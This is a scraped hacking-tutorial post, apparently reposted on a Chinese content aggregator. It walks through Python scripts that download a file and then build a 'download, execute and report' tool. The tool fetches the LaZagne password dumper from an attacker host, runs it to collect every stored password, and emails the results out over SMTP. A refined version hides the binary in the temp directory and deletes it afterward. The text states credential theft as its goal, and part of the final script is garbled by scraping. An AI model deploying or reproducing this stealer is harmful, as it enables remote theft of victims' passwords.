Python Ethical Hacking - Malware Analysis(4)
发布时间:2020-12-20 10:26:53 所属栏目:Python 来源:网络整理
导读:DOWNLOAD_FILE Download files on a system. Once packaged properly will work on all operating systems. Simple but powerfull. Can be used in many situations: download _file + execute_command = download_and_execute download_file + execute_and_
DOWNLOAD_FILE
Can be used in many situations:
#!/usr/bin/env python import requests def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name,"wb") as out_file: out_file.write(get_response.content) download("https://cdn.spacetelescope.org/archives/images/screen/potw1739a.jpg") ? ? ?DOWNLOAD_EXECUTE_AND_REPORT
Ex: remotely steal all stored passwords on a computer! Using the LaZagne tool:https://github.com/AlessandroZ/LaZagne lazagne.exe --help ? ?Use the following command to find all the passwords in the current system. lazagne.exe all ? ?Steal saved passwords remotely #!/usr/bin/env python import requests import smtplib import subprocess def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name,"wb") as out_file: out_file.write(get_response.content) def send_mail(email,password,message): server = smtplib.SMTP("smtp.gmail.com",587) server.starttls() server.login(email,password) server.sendmail(email,email,message) server.quit() download("http://10.0.0.43/evil-files/lazagne.exe") result = subprocess.check_output("lazagne.exe all",shell=True) print(result.decode()) send_mail("[email?protected]","2222211",result) ? Optimize the Python Script - Interacting with the file system.?The evil file will be downloaded in the temp directory and removed after executed.? #!/usr/bin/env python import os import smtplib import subprocess import requests import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name,message) server.quit() temp_directory = tempfile.gettempdir() os.chdir(temp_directory) download("http://10.0.0.43/evil-files/lazagne.exe") result = subprocess.check_output("lazagne.exe all",shell=True) print(result.decode()) send_mail("[email?protected]","2222211",result) os.remove("lazagne.exe") (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |